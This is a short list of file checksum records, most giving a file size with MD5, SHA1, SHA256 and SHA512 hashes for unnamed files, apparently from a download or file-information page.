SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Filesize: 202KB
MD5: ba84dd4e0c1408828ccc1de09f585eda
SHA1: e8e10065d479f8f591b9885ea8487bc673301298
SHA256: 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512: 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

Filesize: 1.2MB
MD5: 577cd52217da6d7163cea46bb01c107f
SHA1: 82b31cc52c538238e63bdfc22d1ea306ea0b852a
SHA256: 139762e396fb930400fab8faab80cb679abbe642144261cba24973fb23bcd728
SHA512: 8abad4eaf2a302dfd9ead058e8c14d996437975730125c46d034a71028921ff36ff5d157ad3671e328ac667ec8095db19fa14a9e8eaaf1a7738aa3d0120b5474

Filesize: 144KB
MD5: cc36e2a5a3c64941a79c31ca320e9797
SHA1: 50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA256: 6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
SHA512: fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0

Filesize: 1.0MB
MD5: 971b0519b1c0461db6700610e5e9ca8e
SHA1: 9a262218310f976aaf837e54b4842e53e73be088
SHA256: 47cf75570c1eca775b2dd1823233d7c40924d3a8d93e0e78c943219cf391d023
SHA512: d234a9c5a1da8415cd4d2626797197039f2537e98f8f43d155f815a7867876cbc1bf466be58677c79a9199ea47d146a174998d21ef0aebc29a4b0443f8857cb9